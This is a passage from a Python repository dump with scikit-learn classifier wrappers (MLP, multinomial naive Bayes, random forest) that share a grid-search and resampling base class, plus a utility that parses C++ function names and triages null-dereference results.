os.path.isfile(dump_file): 41 | self.model = load(dump_file) 42 | else: 43 | self.logger.log("debug", "cv(%d)" %i) 44 | self.grid_search(X_train, y_train, n) 45 | dump(self.model, dump_file) 46 | 47 | y_pred = self.model.predict(X_test) 48 | 49 | importances = self.model.coef_[0] 50 | self.coef.append(self.get_coef_rank(importances, names)) 51 | 52 | self.accuracy_score.append(accuracy_score(y_test, y_pred)) 53 | self.confusion_matrix.append(confusion_matrix(y_test, y_pred)) 54 | self.report.append(classification_report(y_test, y_pred).replace('\n\n', '\n')) 55 | 56 | fpr, tpr, thresholds = roc_curve(y_test, y_pred) 57 | roc_auc = auc(fpr, tpr) 58 | self.roc_auc_score.append(roc_auc) 59 | self.add_tprs(fpr, tpr) 60 | -------------------------------------------------------------------------------- /src/model/mlp_classifier.py: -------------------------------------------------------------------------------- 1 | import os 2 | import log 3 | import numpy as np 4 | from model import Model 5 | from sklearn.neural_network import MLPClassifier 6 | from sklearn.model_selection import GridSearchCV 7 | from sklearn.metrics import accuracy_score, confusion_matrix, classification_report, roc_curve, auc 8 | 9 | from joblib import dump, load 10 | 11 | class MyMLPClassifier(Model): 12 | def __init__(self): 13 | self.name = type(self).__name__[2:] 14 | self.model = MLPClassifier() 15 | 16 | def grid_search(self, X, y, n): 17 | hidden_layer_sizes = [(X.shape[1], ), (X.shape[1], X.shape[1]/2, )] 18 | activation = ['identity', 'logistic', 'tanh', 'relu'] 19 | solver = ['lbfgs', 'sgd', 'adam'] 20 | alpha = [1e-4, 1e-2, 1e+0, 1e+2] 21 | learning_rate = ['constant', 'invscaling', 'adaptive'] 22 | tol = [1e-4, 1e-6, 1e-8, 1e-10, 1e-20] 23 | epsilon = [1e-1, 1e-2, 1e-3, 1e-5, 1e-10] 24 | 25 | parameters = [ 26 | dict(hidden_layer_sizes=hidden_layer_sizes, activation=activation, solver=solver, alpha=alpha, learning_rate=learning_rate, tol=tol, epsilon=epsilon) 27 | ] 28 | 29 | self.run_grid_search(parameters, X, y, n) 30 | 31 | def learn(self, logger, set_list, names_list, n, engine): 32 | super(MyMLPClassifier, self).__init__(logger) 33 | 34 | for i, [[X_train, X_test, y_train, y_test], names] in enumerate(zip(set_list, names_list)): 35 | dump_file = './dump/%s/%s_%s' %(engine, self.name, i) 36 | if os.path.isfile(dump_file): 37 | self.model = load(dump_file) 38 | else: 39 | self.logger.log("debug", "cv(%d)" %i) 40 | self.grid_search(X_train, y_train, n) 41 | dump(self.model, dump_file) 42 | 43 | y_pred = self.model.predict(X_test) 44 | self.coef.append(["",""]) 45 | 46 | self.accuracy_score.append(accuracy_score(y_test, y_pred)) 47 | self.confusion_matrix.append(confusion_matrix(y_test, y_pred)) 48 | self.report.append(classification_report(y_test, y_pred).replace('\n\n', '\n')) 49 | 50 | fpr, tpr, thresholds = roc_curve(y_test, y_pred) 51 | roc_auc = auc(fpr, tpr) 52 | self.roc_auc_score.append(roc_auc) 53 | self.add_tprs(fpr, tpr) 54 | -------------------------------------------------------------------------------- /src/model/model.py: -------------------------------------------------------------------------------- 1 | import log 2 | import numpy as np 3 | import pandas as pd 4 | from sklearn.model_selection import GridSearchCV 5 | from sklearn.model_selection import TimeSeriesSplit, train_test_split, StratifiedKFold 6 | from imblearn.over_sampling import * 7 | from imblearn.under_sampling import * 8 | 9 | class Model(object): 10 | def __init__(self, logger): 11 | self.logger = logger 12 | self.name = type(self).__name__[2:] 13 | self.coef = [] 14 | self.accuracy_score = [] 15 | self.confusion_matrix = [] 16 | self.report = [] 17 | self.roc_auc_score = [] 18 | self.tprs = [] 19 | 20 | def _sampling(self, X, y, over, option): 21 | if over: 22 | if option == 1: 23 | X_sampled, y_sampled = RandomOverSampler().fit_sample(X, y) 24 | elif option == 2: 25 | X_sampled, y_sampled = ADASYN().fit_sample(X, y) 26 | elif option == 3: 27 | X_sampled, y_sampled = SMOTE().fit_sample(X, y) 28 | else: 29 | if option == 1: 30 | X_sampled, y_sampled = RandomUnderSampler().fit_sample(X, y) 31 | elif option == 2: 32 | X_sampled, y_sampled = TomekLinks().fit_sample(X, y) 33 | elif option == 3: 34 | X_sampled, y_sampled = CondensedNearestNeighbour().fit_sample(X, y) 35 | elif option == 4: 36 | X_sampled, y_sampled = OneSidedSelection().fit_sample(X, y) 37 | elif option == 5: 38 | X_sampled, y_sampled = EditedNearestNeighbours().fit_sample(X, y) 39 | elif option == 6: 40 | X_sampled, y_sampled = NeighbourhoodCleaningRule().fit_sample(X, y) 41 | return X_sampled, y_sampled 42 | 43 | def split_train_test(self, n, over, option): 44 | set_list = [] 45 | tscv = TimeSeriesSplit(n_splits=n) 46 | for train_index, test_index in tscv.split(self.X): 47 | X_sample1, y_sample1 = self._sampling(self.X.iloc[train_index], self.y.iloc[train_index], over, option); 48 | X_sample2, y_sample2 = self._sampling(self.X.iloc[test_index], self.y.iloc[test_index], over, option); 49 | new_X = np.vstack([X_sample1, X_sample2]) 50 | new_y = np.append(y_sample1, y_sample2) 51 | X_train, X_test, y_train, y_test = train_test_split(new_X, new_y, test_size=len(test_index), stratify=new_y) 52 | set_list.append([X_train, X_test, y_train, y_test]) 53 | 54 | return set_list 55 | 56 | def run_grid_search(self, parameters, X, y, n): 57 | clf = GridSearchCV(self.model, parameters, cv=n, n_jobs=-1) 58 | best = clf.fit(X, y) 59 | self.logger.log("debug", self.name) 60 | self.logger.log("debug", best.best_score_) 61 | self.logger.log("debug", best.best_params_) 62 | 63 | means = clf.cv_results_['mean_test_score'] 64 | stds = clf.cv_results_['std_test_score'] 65 | 66 | for mean, std, params in zip(means, stds, clf.cv_results_['params']): 67 | self.logger.log("debug", "%0.3f (+/-%0.03f) for %r" % (mean, std * 2, params)) 68 | 69 | self.model = best.best_estimator_ 70 | 71 | def get_coef_rank(self, importances, names): 72 | high_indices = np.argsort(importances)[::-1] 73 | low_indices = np.argsort(importances) 74 | 75 | high_coef_str = "" 76 | for j, ind in enumerate(high_indices): 77 | high_coef_str += ("%d. %s (%f)\n" % (j + 1, names[ind], importances[ind])) 78 | 79 | low_coef_str = "" 80 | for j, ind in enumerate(low_indices): 81 | low_coef_str += ("%d. %s (%f)\n" % (j + 1, names[ind], importances[ind])) 82 | return [high_coef_str, low_coef_str] 83 | 84 | def add_tprs(self, fpr, tpr): 85 | base_fpr = np.linspace(0, 1, 101) 86 | mean_tpr = np.interp(base_fpr, fpr, tpr) 87 | mean_tpr[0] = 0.0 88 | self.tprs.append(mean_tpr) 89 | 90 | def print_data(self): 91 | print self.coef 92 | print self.accuracy_score 93 | print self.confusion_matrix 94 | print self.report 95 | print self.roc_auc_score 96 | 97 | def log_data(self): 98 | self.logger.log("debug", self.coef) 99 | self.logger.log("debug", self.accuracy_score) 100 | self.logger.log("debug", self.confusion_matrix) 101 | self.logger.log("debug", self.report) 102 | self.logger.log("debug", self.roc_auc_score) 103 | -------------------------------------------------------------------------------- /src/model/multinomial_nb.py: -------------------------------------------------------------------------------- 1 | import os 2 | import log 3 | import numpy as np 4 | from model import Model 5 | from sklearn.naive_bayes import MultinomialNB 6 | from sklearn.metrics import accuracy_score, confusion_matrix, classification_report, roc_curve, auc 7 | 8 | from joblib import dump, load 9 | 10 | class MyMultinomialNB(Model): 11 | def __init__(self): 12 | self.name = type(self).__name__[2:] 13 | self.model = MultinomialNB() 14 | 15 | def grid_search(self, X, y, n): 16 | alpha = [1e-2, 1e-1, 1e+0, 1e+1, 1e+2] 17 | 18 | parameters = [ 19 | dict(alpha=alpha) 20 | ] 21 | 22 | self.run_grid_search(parameters, X, y, n) 23 | 24 | def learn(self, logger, set_list, names_list, n, engine): 25 | super(MyMultinomialNB, self).__init__(logger) 26 | 27 | for i, [[X_train, X_test, y_train, y_test], names] in enumerate(zip(set_list, names_list)): 28 | dump_file = './dump/%s/%s_%s' %(engine, self.name, i) 29 | if os.path.isfile(dump_file): 30 | self.model = load(dump_file) 31 | else: 32 | self.logger.log("debug", "cv(%d)" %i) 33 | self.grid_search(X_train, y_train, n) 34 | dump(self.model, dump_file) 35 | 36 | y_pred = self.model.predict(X_test) 37 | 38 | for i in range(len(self.model.coef_)): 39 | importances = self.model.coef_[i] 40 | self.coef.append(self.get_coef_rank(importances, names)) 41 | 42 | self.accuracy_score.append(accuracy_score(y_test, y_pred)) 43 | self.confusion_matrix.append(confusion_matrix(y_test, y_pred)) 44 | self.report.append(classification_report(y_test, y_pred).replace('\n\n', '\n')) 45 | 46 | fpr, tpr, thresholds = roc_curve(y_test, y_pred) 47 | roc_auc = auc(fpr, tpr) 48 | self.roc_auc_score.append(roc_auc) 49 | self.add_tprs(fpr, tpr) 50 | 51 | -------------------------------------------------------------------------------- /src/model/random_forest_classifier.py: -------------------------------------------------------------------------------- 1 | import os 2 | import log 3 | import numpy as np 4 | from model import Model 5 | from sklearn.ensemble import RandomForestClassifier 6 | from sklearn.metrics import accuracy_score, confusion_matrix, classification_report, roc_curve, auc 7 | 8 | from joblib import dump, load 9 | 10 | class MyRandomForestClassifier(Model): 11 | def __init__(self): 12 | self.name = type(self).__name__[2:] 13 | self.model = RandomForestClassifier(n_jobs=-1, random_state=0) 14 | 15 | def grid_search(self, X, y, n): 16 | n_estimators = [10, 50, 100] 17 | criterion = ['gini', 'entropy'] 18 | max_features = ['auto', 'sqrt', 'log2', None] 19 | max_depth = [2, 5, 10, 20, 50, 100] 20 | warm_start = [False, True] 21 | 22 | parameters = [ 23 | dict(n_estimators=n_estimators, criterion=criterion, max_features=max_features, max_depth=max_depth, warm_start=warm_start) 24 | ] 25 | 26 | self.run_grid_search(parameters, X, y, n) 27 | 28 | def learn(self, logger, set_list, names_list, n, engine): 29 | super(MyRandomForestClassifier, self).__init__(logger) 30 | 31 | for i, [[X_train, X_test, y_train, y_test], names] in enumerate(zip(set_list, names_list)): 32 | dump_file = './dump/%s/%s_%s' %(engine, self.name, i) 33 | if os.path.isfile(dump_file): 34 | self.model = load(dump_file) 35 | else: 36 | self.logger.log("debug", "cv(%d)" %i) 37 | self.grid_search(X_train, y_train, n) 38 | dump(self.model, dump_file) 39 | y_pred = self.model.predict(X_test) 40 | 41 | importances = self.model.feature_importances_ 42 | self.coef.append(self.get_coef_rank(importances, names)) 43 | 44 | self.accuracy_score.append(accuracy_score(y_test, y_pred)) 45 | self.confusion_matrix.append(confusion_matrix(y_test, y_pred)) 46 | self.report.append(classification_report(y_test, y_pred).replace('\n\n', '\n')) 47 | 48 | fpr, tpr, thresholds = roc_curve(y_test, y_pred) 49 | roc_auc = auc(fpr, tpr) 50 | self.roc_auc_score.append(roc_auc) 51 | self.add_tprs(fpr, tpr) 52 | -------------------------------------------------------------------------------- /src/util.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | def triage_nullderef(value): 4 | import ast 5 | value = ast.literal_eval(value) 6 | if len(value) == 0: 7 | return -1 8 | for v in value: 9 | if v == 'True': 10 | return 1 11 | return 0 12 | 13 | def count_char(string, char): 14 | cnt = 0 15 | for s in string: 16 | if s == char: 17 | cnt += 1 18 | return cnt 19 | 20 | def parse_function(name): 21 | const = False 22 | return_type = [] 23 | namespace = [] 24 | class_name = "" 25 | function_name = "" 26 | template = "" 27 | 28 | name = name.replace('->','') 29 | 30 | if len(name.split()) > 0 and name.split()[-1] == 'const': 31 | const = True 32 | 33 | # drop arguments 34 | full_name = "" 35 | inTemplate = False 36 | cntTemplate = 0 37 | for i, n in enumerate(name): 38 | if n == "<": 39 | inTemplate = True 40 | cntTemplate += 1 41 | elif n == ">": 42 | cntTemplate -= 1 43 | if inTemplate and cntTemplate == 0: 44 | inTemplate = False 45 | if inTemplate == False and n == "(": 46 | full_name = name[:i] 47 | break 48 | if full_name == "": 49 | full_name = name 50 | 51 | name_list = full_name.split('::') 52 | new_name_list = [] 53 | tmp = "" 54 | cnt = 0 55 | new_cnt = 0 56 | for name in name_list: 57 | new_cnt += count_char(name, '<') 58 | new_cnt -= count_char(name, '>') 59 | if cnt == 0 and new_cnt > 0: 60 | tmp += name 61 | elif cnt > 0 and new_cnt > 0: 62 | tmp += "::" 63 | tmp += name 64 | elif cnt > 0 and new_cnt == 0: 65 | tmp += "::" 66 | tmp += name 67 | new_name_list.append(tmp) 68 | tmp = "" 69 | elif cnt == 0 and new_cnt == 0: 70 | new_name_list.append(name) 71 | cnt = new_cnt 72 | 73 | name_list = new_name_list 74 | 75 | if len(name_list) >= 3: 76 | namespace = name_list[:-2] 77 | class_name = name_list[-2] 78 | function_name = name_list[-1].split('<')[0] 79 | elif len(name_list) == 3: 80 | namespace = [name_list[0]] 81 | class_name = name_list[1] 82 | function_name = name_list[2].split('<')[0] 83 | elif len(name_list) == 2: 84 | class_name = name_list[0] 85 | function_name = name_list[1].split('<')[0] 86 | elif len(name_list) == 1: 87 | function_name = name_list[0].split('<')[0] 88 | 89 | for i, name in enumerate(namespace): 90 | if len(name.split()) >= 2 and '<' not in name.split()[0]: 91 | return_type.append(' '.join(name.split()[:-1])) 92 | namespace[i] = name.split()[-1] 93 | 94 | if len(class_name.split()) >= 2 and '<' not in class_name.split()[0]: 95 | return_type = class_name.split()[:-1] 96 | class_name = class_name.split()[-1] 97 | 98 | if '<' in function_name and '>' in function_name: 99 | template = function_name[function_name.find('<'):function_name.find('>')+1] 100 | 101 | return namespace, class_name, function_name 102 | --------------------------------------------------------------------------------